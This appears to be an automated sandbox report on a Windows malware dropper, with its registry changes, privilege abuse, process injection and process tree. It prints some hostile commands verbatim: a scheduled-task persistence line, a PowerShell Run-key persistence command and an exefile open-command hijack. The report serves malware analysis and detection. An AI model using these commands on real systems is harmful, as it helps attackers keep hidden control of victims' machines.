Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 56003100000000003d586d621000526f616d696e6700400009000400efbe965774b13d586e622e00000084e10100000001000000000000000000000000000000ca995c0052006f0061006d0069006e006700000016000000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings	find.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings	svchost.com
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 5600310000000000965774b112004170704461746100400009000400efbe965774b13d5865622e00000083e1010000000100000000000000000000000000000055a654004100700070004400610074006100000016000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings	stub.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\NodeSlot = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings	15C633~1.EXE
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Opolis.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	stub.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 7800310000000000965774b11100557365727300640009000400efbe874f77483d5865622e000000c70500000000010000000000000000003a00000000000df4620055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings	stub.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings	4363463463464363463463463.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 5000310000000000965783b9100041646d696e003c0009000400efbe965774b13d5865622e00000078e101000000010000000000000000000000000000008c45d500410064006d0069006e00000014000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 5e003100000000003d586d6210004d4143524f4d7e310000460009000400efbe3d586d623d586d622e000000463202000000090000000000000000000000000000009a46ab004d006100630072006f006d006500640069006100000018000000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings	4363463463464363463463463.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	explorer.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exe

pid process

5828 reg.exe
5984 reg.exe
5892 reg.exe
5560 reg.exe
Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

2536 PING.EXE
2832 PING.EXE
3888 PING.EXE
5340 PING.EXE
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 200 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

first.exeexplorer.exe

pid process

2976 first.exe
3916 explorer.exe

pid	process
5828	reg.exe
5984	reg.exe
5892	reg.exe
5560	reg.exe

pid	process
2536	PING.EXE
2832	PING.EXE
3888	PING.EXE
5340	PING.EXE

description	flow	ioc
HTTP User-Agent header	200	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
2976	first.exe
3916	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

find.exepowershell.exesvchost1.exeConhost.exeAppLaunch.exepowershell.exepowershell.exe

pid	process
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
5044	powershell.exe
5044	powershell.exe
5044	powershell.exe
3120	find.exe
1636	svchost1.exe
1636	svchost1.exe
1636	svchost1.exe
3120	find.exe
3120	find.exe
3120	find.exe
4244	Conhost.exe
4244	Conhost.exe
4244	Conhost.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
1636	svchost1.exe
3120	find.exe
3120	find.exe
3120	find.exe
3132	AppLaunch.exe
3132	AppLaunch.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
3120	find.exe
1336	powershell.exe
1336	powershell.exe
1832	powershell.exe
1832	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

OSM-Client.exe

pid process

3052 OSM-Client.exe

pid	process
3052	OSM-Client.exe

Suspicious use of AdjustPrivilegeToken 38 IoCs

Processes:

4363463463464363463463463.execrypted.exefind.exefirst.exesvchost1.exepowershell.exeConhost.exeAppLaunch.exepowershell.exepowershell.exepowershell.exepowershell.exeConhost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe4363463463464363463463463.exepowershell.exepowershell.exe4363463463464363463463463.exealex.exebuild1234.exeLogs.exeWatchDog.exeolehps.exeRegAsm.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	1328	4363463463464363463463463.exe
Token: SeLoadDriverPrivilege	4276	crypted.exe
Token: SeDebugPrivilege	3120	find.exe
Token: SeDebugPrivilege	2976	first.exe
Token: SeDebugPrivilege	1636	svchost1.exe
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeDebugPrivilege	4244	Conhost.exe
Token: SeDebugPrivilege	2976	first.exe
Token: SeDebugPrivilege	3132	AppLaunch.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	4272	powershell.exe
Token: SeDebugPrivilege	4020	Conhost.exe
Token: SeDebugPrivilege	3416	powershell.exe
Token: SeDebugPrivilege	3772	powershell.exe
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeDebugPrivilege	4964	powershell.exe
Token: SeDebugPrivilege	3296	powershell.exe
Token: SeDebugPrivilege	4336	powershell.exe
Token: SeDebugPrivilege	4928	powershell.exe
Token: SeDebugPrivilege	1348	powershell.exe
Token: SeDebugPrivilege	5804	taskkill.exe
Token: SeDebugPrivilege	5836	taskkill.exe
Token: SeDebugPrivilege	3120	find.exe
Token: SeDebugPrivilege	1580	taskkill.exe
Token: SeDebugPrivilege	5300	taskkill.exe
Token: SeDebugPrivilege	5184	4363463463464363463463463.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	5272	powershell.exe
Token: SeDebugPrivilege	5436	4363463463464363463463463.exe
Token: SeDebugPrivilege	1732	alex.exe
Token: SeDebugPrivilege	6108	build1234.exe
Token: SeDebugPrivilege	5584	Logs.exe
Token: SeDebugPrivilege	1676	WatchDog.exe
Token: SeDebugPrivilege	6036	olehps.exe
Token: SeDebugPrivilege	1800	RegAsm.exe
Token: SeLockMemoryPrivilege	1400	explorer.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

networa.exeConhost.exe

pid	process
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2948	Conhost.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

networa.exe

pid	process
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe
2364	networa.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

Conhost.exeu3ts.1.exesvchost1.exeexplorer.exeDctooux.exe

pid process

2948 Conhost.exe
2948 Conhost.exe
3016 u3ts.1.exe
1636 svchost1.exe
3916 explorer.exe
3916 explorer.exe
4408 Dctooux.exe
4408 Dctooux.exe

pid	process
2948	Conhost.exe
2948	Conhost.exe
3016	u3ts.1.exe
1636	svchost1.exe
3916	explorer.exe
3916	explorer.exe
4408	Dctooux.exe
4408	Dctooux.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4363463463464363463463463.exepowershell.exeInstallSetup.execmd.execmd.exeofg7d45fsdfgg312.exeu3ts.1.exefirst.exedusers.execmd.exe

description	pid	process	target process
PID 1328 wrote to memory of 4276	1328	4363463463464363463463463.exe	crypted.exe
PID 1328 wrote to memory of 4276	1328	4363463463464363463463463.exe	crypted.exe
PID 1328 wrote to memory of 4276	1328	4363463463464363463463463.exe	crypted.exe
PID 1328 wrote to memory of 2364	1328	4363463463464363463463463.exe	networa.exe
PID 1328 wrote to memory of 2364	1328	4363463463464363463463463.exe	networa.exe
PID 1328 wrote to memory of 2364	1328	4363463463464363463463463.exe	networa.exe
PID 1328 wrote to memory of 2224	1328	4363463463464363463463463.exe	powershell.exe
PID 1328 wrote to memory of 2224	1328	4363463463464363463463463.exe	powershell.exe
PID 1328 wrote to memory of 2224	1328	4363463463464363463463463.exe	powershell.exe
PID 2224 wrote to memory of 5004	2224	powershell.exe	cmd.exe
PID 2224 wrote to memory of 5004	2224	powershell.exe	cmd.exe
PID 2224 wrote to memory of 5004	2224	powershell.exe	cmd.exe
PID 1328 wrote to memory of 1332	1328	4363463463464363463463463.exe	Conhost.exe
PID 1328 wrote to memory of 1332	1328	4363463463464363463463463.exe	Conhost.exe
PID 1328 wrote to memory of 1332	1328	4363463463464363463463463.exe	Conhost.exe
PID 1328 wrote to memory of 4960	1328	4363463463464363463463463.exe	InstallSetup.exe
PID 1328 wrote to memory of 4960	1328	4363463463464363463463463.exe	InstallSetup.exe
PID 1328 wrote to memory of 4960	1328	4363463463464363463463463.exe	InstallSetup.exe
PID 4960 wrote to memory of 3968	4960	InstallSetup.exe	u3ts.0.exe
PID 4960 wrote to memory of 3968	4960	InstallSetup.exe	u3ts.0.exe
PID 4960 wrote to memory of 3968	4960	InstallSetup.exe	u3ts.0.exe
PID 1328 wrote to memory of 1636	1328	4363463463464363463463463.exe	svchost1.exe
PID 1328 wrote to memory of 1636	1328	4363463463464363463463463.exe	svchost1.exe
PID 1328 wrote to memory of 2948	1328	4363463463464363463463463.exe	Conhost.exe
PID 1328 wrote to memory of 2948	1328	4363463463464363463463463.exe	Conhost.exe
PID 1328 wrote to memory of 2948	1328	4363463463464363463463463.exe	Conhost.exe
PID 5004 wrote to memory of 4936	5004	cmd.exe	cmd.exe
PID 5004 wrote to memory of 4936	5004	cmd.exe	cmd.exe
PID 5004 wrote to memory of 4936	5004	cmd.exe	cmd.exe
PID 4936 wrote to memory of 3120	4936	cmd.exe	find.exe
PID 4936 wrote to memory of 3120	4936	cmd.exe	find.exe
PID 1328 wrote to memory of 4072	1328	4363463463464363463463463.exe	i.exe
PID 1328 wrote to memory of 4072	1328	4363463463464363463463463.exe	i.exe
PID 1328 wrote to memory of 4072	1328	4363463463464363463463463.exe	i.exe
PID 1328 wrote to memory of 2976	1328	4363463463464363463463463.exe	first.exe
PID 1328 wrote to memory of 2976	1328	4363463463464363463463463.exe	first.exe
PID 4960 wrote to memory of 3016	4960	InstallSetup.exe	u3ts.1.exe
PID 4960 wrote to memory of 3016	4960	InstallSetup.exe	u3ts.1.exe
PID 4960 wrote to memory of 3016	4960	InstallSetup.exe	u3ts.1.exe
PID 1328 wrote to memory of 1356	1328	4363463463464363463463463.exe	ofg7d45fsdfgg312.exe
PID 1328 wrote to memory of 1356	1328	4363463463464363463463463.exe	ofg7d45fsdfgg312.exe
PID 1328 wrote to memory of 1356	1328	4363463463464363463463463.exe	ofg7d45fsdfgg312.exe
PID 1356 wrote to memory of 1300	1356	ofg7d45fsdfgg312.exe	SCHTASKS.exe
PID 1356 wrote to memory of 1300	1356	ofg7d45fsdfgg312.exe	SCHTASKS.exe
PID 1356 wrote to memory of 1300	1356	ofg7d45fsdfgg312.exe	SCHTASKS.exe
PID 1328 wrote to memory of 2876	1328	4363463463464363463463463.exe	dusers.exe
PID 1328 wrote to memory of 2876	1328	4363463463464363463463463.exe	dusers.exe
PID 1328 wrote to memory of 2876	1328	4363463463464363463463463.exe	dusers.exe
PID 3016 wrote to memory of 5004	3016	u3ts.1.exe	cmd.exe
PID 3016 wrote to memory of 5004	3016	u3ts.1.exe	cmd.exe
PID 3016 wrote to memory of 5004	3016	u3ts.1.exe	cmd.exe
PID 2976 wrote to memory of 5044	2976	first.exe	powershell.exe
PID 2976 wrote to memory of 5044	2976	first.exe	powershell.exe
PID 2876 wrote to memory of 1512	2876	dusers.exe	cmd.exe
PID 2876 wrote to memory of 1512	2876	dusers.exe	cmd.exe
PID 2876 wrote to memory of 1512	2876	dusers.exe	cmd.exe
PID 5004 wrote to memory of 2232	5004	cmd.exe	chcp.com
PID 5004 wrote to memory of 2232	5004	cmd.exe	chcp.com
PID 5004 wrote to memory of 2232	5004	cmd.exe	chcp.com
PID 1512 wrote to memory of 2648	1512	cmd.exe	Users.exe
PID 1512 wrote to memory of 2648	1512	cmd.exe	Users.exe
PID 1512 wrote to memory of 2648	1512	cmd.exe	Users.exe
PID 5004 wrote to memory of 244	5004	cmd.exe	wmild.exe
PID 5004 wrote to memory of 244	5004	cmd.exe	wmild.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

Processes:

build1234.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	build1234.exe

outlook_win_path 1 IoCs

Processes:

build1234.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	build1234.exe

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1328

C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4276

C:\Users\Admin\AppData\Local\Temp\Files\networa.exe
"C:\Users\Admin\AppData\Local\Temp\Files\networa.exe"
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2364

C:\Users\Admin\AppData\Local\Temp\Files\fund.exe
"C:\Users\Admin\AppData\Local\Temp\Files\fund.exe"
2⤵
PID:2224

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\DriverHostCrtNet\jO3lbUgUCuGG0nAZHcS.vbe"
3⤵
PID:5004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\DriverHostCrtNet\ELvGRxvU.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:4936

C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20AH.NET.exe
"C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20AH.NET.exe"
2⤵
PID:1332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 1124
3⤵
- Program crash
PID:2500

C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup.exe
"C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4960

C:\Users\Admin\AppData\Local\Temp\u3ts.0.exe
"C:\Users\Admin\AppData\Local\Temp\u3ts.0.exe"
3⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 816
4⤵
- Program crash
PID:2864

C:\Users\Admin\AppData\Local\Temp\u3ts.1.exe
"C:\Users\Admin\AppData\Local\Temp\u3ts.1.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5004

C:\Windows\SysWOW64\chcp.com
chcp 1251
5⤵
PID:2232

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
5⤵
- Creates scheduled task(s)
PID:244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 1144
3⤵
- Program crash
PID:1692

C:\Users\Admin\AppData\Local\Temp\Files\svchost1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\svchost1.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1636

C:\Users\Admin\AppData\Local\Temp\Files\am.exe
"C:\Users\Admin\AppData\Local\Temp\Files\am.exe"
2⤵
PID:2948

C:\Users\Admin\AppData\Local\Temp\Files\i.exe
"C:\Users\Admin\AppData\Local\Temp\Files\i.exe"
2⤵
- Executes dropped EXE
PID:4072

C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe
"C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2876

C:\Users\Admin\AppData\Local\Temp\Files\ofg7d45fsdfgg312.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ofg7d45fsdfgg312.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1356

C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1152

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'A_second_wind_for_important_cases';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'A_second_wind_for_important_cases' -Value '"C:\Users\Admin\AppData\Local\A_second_wind_for_important_cases\A_second_wind_for_important_cases.exe"' -PropertyType 'String'
3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:3632

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
3⤵
PID:516

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
3⤵
PID:6060

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
3⤵
PID:5768

C:\Users\Admin\AppData\Local\Temp\Files\minuscrypt_crypted.exe
"C:\Users\Admin\AppData\Local\Temp\Files\minuscrypt_crypted.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1692

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1692 -s 496
3⤵
- Program crash
PID:4272

C:\Users\Admin\AppData\Local\Temp\Files\first.exe
"C:\Users\Admin\AppData\Local\Temp\Files\first.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2976

C:\Users\Admin\AppData\Local\Temp\Files\baseline.exe
"C:\Users\Admin\AppData\Local\Temp\Files\baseline.exe"
2⤵
- Executes dropped EXE
PID:1832

C:\Users\Admin\AppData\Local\Temp\Files\alex.exe
"C:\Users\Admin\AppData\Local\Temp\Files\alex.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
